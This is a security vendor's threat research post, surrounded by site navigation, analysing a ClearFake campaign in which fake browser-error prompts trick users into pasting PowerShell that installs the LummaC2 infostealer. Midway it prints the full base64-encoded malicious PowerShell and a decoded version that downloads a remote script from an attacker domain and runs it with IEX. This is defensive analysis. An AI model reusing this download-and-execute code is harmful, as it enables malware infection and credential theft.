Webinar | Team Burned Out on Phishing Analysis? Here's How to Help.
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
July 25, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
Key Points
In May 2024, ReliaQuest discovered a campaign from the JavaScript framework “ClearFake” that uses new execution techniques: The adversary tricks users into manually copying and executing malicious code in PowerShell. This differs from the typical drive-by downloads frequently observed with ClearFake and other “fake browser update”–associated distribution campaigns, in which the victim is tricked into downloading and executing a malicious payload. This new technique is designed to evade detection by security tools, as it involves the user manually running the malicious PowerShell commands directly, as opposed to being invoked by a script file downloaded and executed by the user. The campaign then deploys a multi-stage malware infection using PowerShell and sandbox evasion techniques that leads to the installation of the LummaC2 infostealer malware.
As this campaign requires users to manually execute PowerShell code themselves, this technique will likely have a lower chance of tricking users. However, it may result in more severe consequences, because successful execution could result in detections and controls being bypassed. Security teams need to be aware of this new execution technique, review current controls to restrict PowerShell use, and educate users to not copy and paste code into the PowerShell or Windows Command Shell consoles.
In this report, we will break down the stages of this latest ClearFake campaign, delve into the use cases we observed, and provide mitigations that organizations can implement to protect against this emerging threat.
ClearFake is a JavaScript framework known to use drive-by downloads and social engineering techniques, often presenting fake “browser update” pages to users.
These attacks work by driving traffic to websites that mimic legitimate ones, then presenting users with a page claiming that they need to perform a browser update to view the site’s content.
The goal is typically to get users to download malicious files, leading to data theft or deployment of further malware.
On May 26, 2024, we first identified attacks on our customer base that began with users visiting a compromised website hosting a fake browser error prompt that asks the user to install a root certificate to fix the issue. The websites we observed in these incidents belonged to legitimate businesses that were likely compromised through vulnerabilities allowing code to be injected. The error prompt instructs the user to manually execute malicious PowerShell code, which subsequently installs LummaC2 (see Figure 1).
Figure 1: Attack flow
The prompt on the compromised sites indicates that the content cannot be displayed properly and instructs users to install a “root certificate” to resolve the issue by clicking a “Fix it” button (see Figure 2).
Figure 2: First fake update prompt
After clicking “How to fix,” another prompt appears that contains instructions for installing the root certificate. The message features a “copy” button that, when clicked, copies obfuscated malicious PowerShell code into the user’s clipboard (see Figure 3). Next, the user is guided through several steps to open a PowerShell terminal and paste in the code, which then automatically executes.
This stage—tricking the user to run the malicious PowerShell manually—represents the noteworthy aspect of this campaign. The method bypasses signatures and detections, including suspicious parent–child process relationships, malicious file downloads, and Mark-of-the-Web signatures. The initial PowerShell execution runs under explorer.exe with no parent process and without prior command lines.
Figure 3: Second fake update prompt
In each instance, the PowerShell code copied by the user was obfuscated using base64 encoding. Decoding the base64 reveals malicious PowerShell code:
ipconfig /flushdns
$VBrowser = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String (“JGpvYiA9IFN0YXJ0LUpvYiAtU2NyaXB0QmxvY2sgewogICAgQWRkLVR5cGUgLUFzc2VtY mx5TmFtZSBTeXN0ZW0uV2luZG93cy5Gb3JtcwogICAgW1N5c3RlbS5XaW5kb3dzLkZvcm1z Lk1lc3NhZ2VCb3hdOjpTaG93KCJUaGUgb3BlcmF0aW9uIGNvbXBsZXRlZCBzdWNjZXNzZn VsbHksIHBsZWFzZSByZWxvYWQgdGhlIHBhZ2UiLCAiU3lzdGVtIiwgMCwgNjQpCn0KCiRn OTFGID0gJ2h0dHBzOi8vcnRhdHRhY2suYmFxZWJlaTEub25saW5lL2RmL3R0JwokdjM4Sy A9IEB7ICdVc2VyLUFnZW50JyA9ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOy BXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDa HJvbWUvMTAyLjAuMC4wIFNhZmFyaS81MzcuMzYnIH0KJHowNFEgPSBJbnZva2UtV2ViUm VxdWVzdCAtVXJpICRnOTFGIC1Vc2VCYXNpY1BhcnNpbmcgLUhlYWRlcnMgJHYzOEsKCklFW CAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJHowNFEuQ29ud GVudCkpCgpjbGVhci1ob3N0Owo=”));
$Update = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String (“U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==”));
$VER = $VBrowser + “; ” + $Update;
Invoke-Expression $VER;
exit;
$VBrowser = $job = Start-Job -ScriptBlock {
Add-Type -AssemblyName System[dot]windows.Forms
[System[dot]windows.Forms.MessageBox]::Show(“The operation completed successfully, please reload the page”, “System”, 0, 64)
}
$g91F = ‘hxxps://rtattack.baqebei1[dot]online/df/tt’
$v38K = @{ ‘User-Agent’ = ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36’ }
$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K
IEX ([System.Text.Encoding]::UTF8.GetString($z04Q.Content))
clear-host;
$update = Set-Clipboard -Value ” “;
When pasted into the PowerShell terminal, the code conducts the below execution:
When the PowerShell script is executed, the attacker-controlled domain conducts a user agent check. If the correct user agent is supplied, a second PowerShell script is downloaded. The PowerShell script checks the infected device’s CPU temperature, and, if the result is null, execution is terminated. The CPU temperature check is a form of sandbox evasion since virtual machines will not return a value. If a CPU temperature value is returned, execution continues and a ZIP file is downloaded from the domain “cdnforfiles[.]xyz.” The ZIP file contains the legitimate “MediaInfo.exe” file and the malicious DLL “MediaInfo_i386.dll.” The PowerShell script executes any files with a “.exe” extension, which subsequently executes MediaInfo.exe and the malicious DLL via DLL sideloading. Upon successful execution, LummaC2 is installed as an executable file.
In this section, we explore two case studies ReliaQuest observed as part of the new ClearFake campaign.
A user visited an infected website that referenced the attacker-controlled domain “d1x9q8w2e4[.]xyz” to produce the fake update prompt. The user copied the malicious PowerShell code into the PowerShell console and executed it. The second stage download attempt was blocked by technical controls, preventing any traffic to the second domain “rtattack.baqebei1[dot]online,” thereby preventing further infection.
ReliaQuest detected the download attempt and proactively blocked the hash value of the next PowerShell file intended for download. The organization permits PowerShell execution on the user’s host, enabling the user to copy, paste, and execute the malicious code. Technical controls stopped the second download stage; however, further restricting the user of PowerShell and the user being made aware of the threat could have prevented initial execution.
A user visited an infected website referencing the attacker-controlled domain “dnforfiles[.]xyz” to inject the update prompt. The user followed the instructions to copy and paste the malicious PowerShell code into a console. The following infection chain occurred successfully:
ReliaQuest detected the LummaC2 malware and performed triage of the incident. The ReliaQuest technical operations team used GreyMatter Respond to ban the hash values of the malicious files and block the attacker-controlled domains and IP addresses. We recommended the organization perform a full wipe and re-image of the infected host from a known good backup to remove any persistence gained by the malware and change the impacted user’s credentials out of precaution. This case study provides further evidence of the importance of restricting users from executing applications such as PowerShell and limiting PowerShell execution when necessary. Networking controls could have blocked connections to the anomalous top-level domain “.xyz,” preventing further infection if implemented.
To identify malicious activity associated with ClearFake, ReliaQuest offers the detection rules to customers. Associated GreyMatter Respond Plays can be executed to perform remediation by ReliaQuest customers or on their behalf by the ReliaQuest team.
In addition to the detection rules cited above, we offer the following general recommendations and best practices to protect against the campaign detailed in this report.
The below IoCs have been proactively added to the GreyMatter Intel feed for ReliaQuest customers.
Hashes
Attacker-Controlled Domains
Attacker-Controlled IP Addresses
Infected Websites
Get a live demo of our security operations platform, GreyMatter, and learn how you can improve visibility, reduce complexity, and manage risk in your organization.